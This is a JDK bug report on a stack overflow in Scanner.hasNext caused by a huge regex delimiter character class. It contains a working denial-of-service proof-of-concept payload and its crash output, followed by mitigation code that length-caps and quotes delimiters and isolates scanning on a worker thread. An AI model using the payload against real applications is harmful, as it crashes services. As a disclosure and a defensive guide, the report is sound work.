  2. JDK-8282393

Scanner.hasNext lacks recursion detection


Details

    • Type: Bug
    • Resolution: Unresolved
    • Priority: P4
    • Fix Version/s: tbd
    • Affects Version/s: 18
    • Component/s: core-libs
    • Labels: None

    Description

      j.u.Scanner allows the token delimiter to be set as a regular expression string.
      The regex engine places no upper bound on the recursion depth of its predicate
      evaluation: a character class built from many single characters is compiled into a
      chain of nested CharPredicate unions, and evaluating that chain on a single input
      character recurses once per element. With a large enough class, querying whether
      the scanner has a next token (Scanner.hasNext) overflows the thread stack.

      Developers could expose this API to let users split or query larger texts with
      their own delimiter, for example in a web application. A user-controlled delimiter
      then becomes a denial-of-service vector: the edge case is not rejected when the
      pattern is compiled, and the scanning thread instead dies with a StackOverflowError.

      The following PoC illustrates the issue:

      import java.util.*;

      public class ScannerSOE {
          public static void main(String[] a) {
              // Raw delimiter bytes; decoded with the default charset (UTF-8 since JDK 18),
              // so each invalid byte such as -118 (0x8A) becomes U+FFFD, a character
              // above 0xFF that the regex compiler adds to the class via a union
              // predicate rather than via the bit set used for Latin-1 characters.
              String payload = new String(new byte[]{
                  91, 92, 97, 92, 87, 45, 45, 45, 45, 45, 45, 45, 45, 45, 45, 120, 121, 122,
                  123, 49, 44, 51, 38, 38, 38, 99, -118, -118, 69, 93, -126, -36});
              Scanner s = new Scanner("1 fish 2 fish red fish blue fish");
              // Open the character class, then inflate it with 16384 more copies of the
              // same character before the closing part of the payload: the class is
              // compiled into a union chain one element deep per character.
              s.useDelimiter(payload.substring(0, 26)
                  + (new String(new byte[]{-118})).repeat(16384)
                  + payload.substring(27));
              // Evaluating the chain against the first input character overflows the stack.
              s.hasNext();
          }
      }

      To reproduce:

      $ java ScannerSOE 2>&1 | head -4
      Exception in thread "main" java.lang.StackOverflowError
      at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
      at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
      at java.base/java.util.regex.Pattern$CharPredicate.lambda$union$1(Pattern.java:5618)
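
      Because the trigger is a delimiter string that reaches java.util.regex from user
      input, the practical mitigation sits in the application rather than in the JDK.
      The following is an added example, not part of this report or of the JDK: it
      treats user delimiters as literal text unless regex syntax is explicitly allowed,
      caps the length of regex delimiters, and runs the scan on a worker thread with its
      own stack so that a StackOverflowError is caught there and converted into an
      ordinary exception instead of unwinding the caller. The limits
      MAX_DELIMITER_CHARS and WORKER_STACK_BYTES are assumed policy values, and the
      hostile pattern is reconstructed from the report's bytes on the assumption that
      the default charset decodes each invalid byte to U+FFFD.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.FutureTask;
import java.util.regex.Pattern;

public class SafeDelimiterScan {
    // Assumed policy limits, not JDK values.
    static final int MAX_DELIMITER_CHARS = 256;
    static final long WORKER_STACK_BYTES = 512L * 1024;

    // Literal delimiters are quoted so metacharacters are inert; regex delimiters are
    // accepted only when the caller opts in, and even then only up to a length cap.
    static Pattern compileDelimiter(String userDelimiter, boolean allowRegex) {
        if (userDelimiter.length() > MAX_DELIMITER_CHARS) {
            throw new IllegalArgumentException(
                "delimiter longer than " + MAX_DELIMITER_CHARS + " chars");
        }
        String regex = allowRegex ? userDelimiter : Pattern.quote(userDelimiter);
        return Pattern.compile(regex);
    }

    // Runs the scan on a dedicated thread with a bounded stack. A StackOverflowError
    // raised by the matcher is caught on that thread and surfaced to the caller as an
    // ExecutionException wrapping an IllegalArgumentException.
    static List<String> tokenize(String text, Pattern delimiter)
            throws InterruptedException, ExecutionException {
        FutureTask<List<String>> task = new FutureTask<>(() -> {
            try (Scanner s = new Scanner(text)) {
                s.useDelimiter(delimiter);
                List<String> out = new ArrayList<>();
                while (s.hasNext()) {
                    out.add(s.next());
                }
                return out;
            } catch (StackOverflowError e) {
                throw new IllegalArgumentException(
                    "delimiter pattern exhausted the matcher stack", e);
            }
        });
        Thread worker = new Thread(null, task, "scanner-worker", WORKER_STACK_BYTES);
        worker.setDaemon(true);
        worker.start();
        worker.join();
        return task.get();
    }

    public static void main(String[] args) throws Exception {
        // Literal mode: a bare "|" would be an alternation of two empty regexes,
        // but quoted it splits on the pipe character as the user intended.
        System.out.println(tokenize("a|b|c", compileDelimiter("|", false)));

        // Hostile delimiter reconstructed from the report (assumes U+FFFD decoding).
        String hostile = "[\\a\\W----------xyz{1,3&&&c"
            + "\uFFFD".repeat(16385) + "E]\uFFFD\uFFFD";
        String text = "1 fish 2 fish red fish blue fish";

        // With the length cap in place the pattern never reaches the regex compiler.
        try {
            compileDelimiter(hostile, true);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // Bypassing the cap shows the worker-thread containment: the overflow is
        // reported as an exception and the calling thread survives.
        try {
            tokenize(text, Pattern.compile(hostile));
        } catch (ExecutionException e) {
            System.out.println("contained: " + e.getCause());
        }
    }
}
```

      The worker thread is given a fixed stack size hint so that a pattern which
      overflows does so inside the worker regardless of how the calling thread was
      created; the length cap is the primary control, since a 256-character class
      cannot build a union chain deep enough to exhaust any realistic stack.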

      People

        Assignee: Ian Graves (igraves)
        Reporter: Marc Schönefeld (mschoene)